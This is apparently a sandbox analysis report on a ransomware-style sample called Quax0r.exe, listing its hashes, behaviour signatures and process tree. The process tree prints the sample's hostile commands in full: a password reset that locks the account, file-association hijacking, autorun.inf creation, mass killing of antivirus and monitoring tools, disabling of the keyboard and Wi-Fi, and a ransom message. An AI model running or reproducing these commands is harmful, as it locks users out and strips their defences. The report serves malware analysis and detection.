Overview

overview

7

Static

static

Quax0r.exe

windows7_x64

7

Quax0r.exe

windows10-2004_x64

7

Analysis

  • max time kernel
    91s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    01/06/2022, 09:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Quax0r.exe

  • Size

    16KB

  • MD5

    779b96f25a5c23fb88062503290e69ce

  • SHA1

    1d3b85c38418d296ced87fb7155e40aad8cb0773

  • SHA256

    cd1bb0b84729b272e28a48cdfc22ef1f2577e4a1779a9fe871e54cf71707ded8

  • SHA512

    7ac94fb7d832302f0aba124f41e168d00e1b3567ff88b7938c25cfb4dd72539e80b56862abf65be99f800d2dec034dbab56be3d5021175a314beee65def9ce3a

Score
7/10
spywarestealer

Malware Config

Signatures

  • Drops startup file 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops desktop.ini file(s) 23 IoCs
  • Drops autorun.inf file 1 TTPs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in Program Files directory 64 IoCs
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 8 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Quax0r.exe
    "C:\Users\Admin\AppData\Local\Temp\Quax0r.exe"
    1⤵
    • Drops startup file
    • Drops desktop.ini file(s)
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1572
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c net users %username% LOCKEDBYROZBEHOFSATAN
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2216
      • C:\Windows\SysWOW64\net.exe
        net users Admin LOCKEDBYROZBEHOFSATAN
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3872
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 users Admin LOCKEDBYROZBEHOFSATAN
          4⤵
            PID:4728
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c assoc .exe=RozbehOfSatanFile && assoc .bat=RozbehOfSatanFile && assoc .cmd=RozbehOfSatanFile
        2⤵
        • Modifies registry class
        PID:392
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c echo ^[autorun^] > ..\\autorun.inf
        2⤵
          PID:3988
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c taskkill /im chrome.exe /f && taskkill /im WireShark.exe /f && taskkill /im MSASCUI.exe /f && taskkill /im taskmgr.exe /f && taskkill /im regedit.exe /f && taskkill /im Kaspersky.exe /f && taskkill /im msseces.exe /f && taskkill /im nod32.exe /f && taskkill /im msmpeng.exe /f && taskkill /im navapsvc.exe /f && taskkill /im avkwctl.exe /f && taskkill /im fsav32.exe /f && rundll32 keyboard,disable
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2916
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /im chrome.exe /f
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4716
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c netsh Interface Set Interface Wi-Fi 12 disable
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4472
          • C:\Windows\SysWOW64\netsh.exe
            netsh Interface Set Interface Wi-Fi 12 disable
            3⤵
              PID:4840
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c echo open^=WindowsScan^.exe >> ..\\autorun.inf
            2⤵
              PID:4112
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c color CF && @echo off && cls && echo All files have been encrypted by NominatusCrypto ( Quax0r ) contact the creator of this virus on discord Nominatus#9251 for more information if you restart then your account will be useless! files cannot be decrypted without paying the ransom to the creator!! live or die? make your choice now! && pause > nul
              2⤵
                PID:1276
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c assoc .txt=txtfile
                2⤵
                • Modifies registry class
                PID:2504

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\autorun.inf
              Filesize

              35B

              MD5

              261490e22651f58aeb72b82b148f1e02

              SHA1

              f180054e9592561288db216c9fb156a99ad5830f

              SHA256

              b12b5eb5be8ef735ed43076e438f438a34adf362a27b187aeba422a4e831b4ba

              SHA512

              83edf93509d5cc5f275c5877bcf571cf5a8716df603783155bb88338008d409ff5041dfb040253c400750e000e51c9eb8c26cb714cd06186ab9b00fc44b2769c

              Download Submit

            • C:\Users\Admin\AppData\Local\autorun.inf
              Filesize

              35B

              MD5

              261490e22651f58aeb72b82b148f1e02

              SHA1

              f180054e9592561288db216c9fb156a99ad5830f

              SHA256

              b12b5eb5be8ef735ed43076e438f438a34adf362a27b187aeba422a4e831b4ba

              SHA512

              83edf93509d5cc5f275c5877bcf571cf5a8716df603783155bb88338008d409ff5041dfb040253c400750e000e51c9eb8c26cb714cd06186ab9b00fc44b2769c

              Download Submit

            • memory/1572-133-0x0000000005350000-0x00000000053E2000-memory.dmp

              Filesize

              584KB

              Download

            • memory/1572-135-0x00000000055F0000-0x0000000005646000-memory.dmp

              Filesize

              344KB

              Download

            • memory/1572-134-0x0000000005250000-0x000000000525A000-memory.dmp

              Filesize

              40KB

              Download

            • memory/1572-130-0x00000000008B0000-0x00000000008BC000-memory.dmp

              Filesize

              48KB

              Download

            • memory/1572-132-0x0000000005900000-0x0000000005EA4000-memory.dmp

              Filesize

              5.6MB

              Download

            • memory/1572-131-0x00000000052B0000-0x000000000534C000-memory.dmp

              Filesize

              624KB

              Download